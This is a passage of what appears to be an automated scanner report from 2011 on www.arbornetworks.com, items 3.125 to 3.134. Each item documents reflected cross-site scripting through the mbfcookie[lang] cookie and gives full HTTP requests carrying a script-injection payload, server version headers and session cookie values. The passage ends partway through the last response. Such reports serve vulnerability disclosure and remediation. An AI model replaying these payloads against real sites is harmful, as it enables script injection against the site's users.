The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bce73"><script>alert(1)</script>78e956c9366 was submitted in the mbfcookie[lang] cookie. This input was echoed as bce73\"><script>alert(1)</script>78e956c9366 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contact HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enbce73"><script>alert(1)</script>78e956c9366; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:04:05 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=3f377e4835493783b636581d8d915ac7; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:04:05 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:04:05 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:04:06 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:04:21 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="enbce73\"><script>alert(1)</script>78e956c9366">
...[SNIP]...

3.125. http://www.arbornetworks.com/de/5.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /de/5.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a345"><script>alert(1)</script>86899845244 was submitted in the mbfcookie[lang] cookie. This input was echoed as 6a345\"><script>alert(1)</script>86899845244 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /de/5.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en6a345"><script>alert(1)</script>86899845244; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:57:49 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=a0c071500549d1e94ca519f8921d0c9e; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:57:48 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:57:48 GMT; path=/
Set-Cookie: mbfcookie[lang]=de; expires=Thu, 03-Feb-2011 23:57:49 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:57:49 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="en6a345\"><script>alert(1)</script>86899845244">
...[SNIP]...

3.126. http://www.arbornetworks.com/de/infrastructure-security-report.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /de/infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c53b"><script>alert(1)</script>f0a1f66cb8a was submitted in the mbfcookie[lang] cookie. This input was echoed as 4c53b\"><script>alert(1)</script>f0a1f66cb8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /de/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en4c53b"><script>alert(1)</script>f0a1f66cb8a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:05:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=ded35de59f9cde52854e6194ae0b18e8; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:05:18 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:05:18 GMT; path=/
Set-Cookie: mbfcookie[lang]=de; expires=Fri, 04-Feb-2011 00:05:19 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:05:26 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en4c53b\"><script>alert(1)</script>f0a1f66cb8a">
...[SNIP]...

3.127. http://www.arbornetworks.com/deeppacketinspection [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /deeppacketinspection

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b5ce"><script>alert(1)</script>46a86177217 was submitted in the mbfcookie[lang] cookie. This input was echoed as 5b5ce\"><script>alert(1)</script>46a86177217 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deeppacketinspection HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en5b5ce"><script>alert(1)</script>46a86177217; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:01:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=2eebbcb6ceb0e47bc26620dac1e8ac4b; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:01:44 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:01:44 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:01:45 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:01:46 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en5b5ce\"><script>alert(1)</script>46a86177217">
...[SNIP]...

3.128. http://www.arbornetworks.com/en/9.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/9.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ad11"><script>alert(1)</script>45c595a351a was submitted in the mbfcookie[lang] cookie. This input was echoed as 4ad11\"><script>alert(1)</script>45c595a351a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/9.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en4ad11"><script>alert(1)</script>45c595a351a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:59 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=2f90ebf3f79c56732a249f6b42e46a68; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:00 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:00 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:55:01 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:55:02 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="en4ad11\"><script>alert(1)</script>45c595a351a">
...[SNIP]...

3.129. http://www.arbornetworks.com/en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0de3"><script>alert(1)</script>c78fdd82d6c was submitted in the mbfcookie[lang] cookie. This input was echoed as e0de3\"><script>alert(1)</script>c78fdd82d6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ene0de3"><script>alert(1)</script>c78fdd82d6c; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:07 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=27009310fb8993a60206523b612c1753; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:08 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:08 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:09 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:09 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="ene0de3\"><script>alert(1)</script>c78fdd82d6c">
...[SNIP]...

3.130. http://www.arbornetworks.com/en/arbor-in-action-global-network-security-solution-resources.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/arbor-in-action-global-network-security-solution-resources.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61438"><script>alert(1)</script>bf6eef2e4a3 was submitted in the mbfcookie[lang] cookie. This input was echoed as 61438\"><script>alert(1)</script>bf6eef2e4a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/arbor-in-action-global-network-security-solution-resources.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en61438"><script>alert(1)</script>bf6eef2e4a3; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=d3554e8c89ab697c33ada74e025444df; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:16 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:16 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:17 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:17 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en61438\"><script>alert(1)</script>bf6eef2e4a3">
...[SNIP]...

3.131. http://www.arbornetworks.com/en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2791d"><script>alert(1)</script>a9d0e26d8e0 was submitted in the mbfcookie[lang] cookie. This input was echoed as 2791d\"><script>alert(1)</script>a9d0e26d8e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en2791d"><script>alert(1)</script>a9d0e26d8e0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=393079ea34c82ec326ef11037b6f5423; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:54:57 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:54:57 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:54:58 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:54:59 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en2791d\"><script>alert(1)</script>a9d0e26d8e0">
...[SNIP]...

3.132. http://www.arbornetworks.com/en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d75d"><script>alert(1)</script>8224aca7549 was submitted in the mbfcookie[lang] cookie. This input was echoed as 3d75d\"><script>alert(1)</script>8224aca7549 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en3d75d"><script>alert(1)</script>8224aca7549; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=2926e27934b597acfb84a5a477897674; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:54:54 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:54:54 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:54:55 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:54:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en3d75d\"><script>alert(1)</script>8224aca7549">
...[SNIP]...

3.133. http://www.arbornetworks.com/en/asert-arbor-security-engineering-response-team-2.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/asert-arbor-security-engineering-response-team-2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e43ff"><script>alert(1)</script>b793ea52c1b was submitted in the mbfcookie[lang] cookie. This input was echoed as e43ff\"><script>alert(1)</script>b793ea52c1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/asert-arbor-security-engineering-response-team-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ene43ff"><script>alert(1)</script>b793ea52c1b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:52:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=564a9f15ff3e6e27cb466251245f4c93; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:52:41 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:52:41 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:52:42 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:52:42 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="ene43ff\"><script>alert(1)</script>b793ea52c1b">
...[SNIP]...

3.134. http://www.arbornetworks.com/en/atlas-global-network-threat-analysis-460.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/atlas-global-network-threat-analysis-460.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804ae"><script>alert(1)</script>00ecfe4a1d9 was submitted in the mbfcookie[lang] cookie. This input was echoed as 804ae\"><script>alert(1)</script>00ecfe4a1d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/atlas-global-network-threat-analysis-460.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en804ae"><script>alert(1)</script>00ecfe4a1d9; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
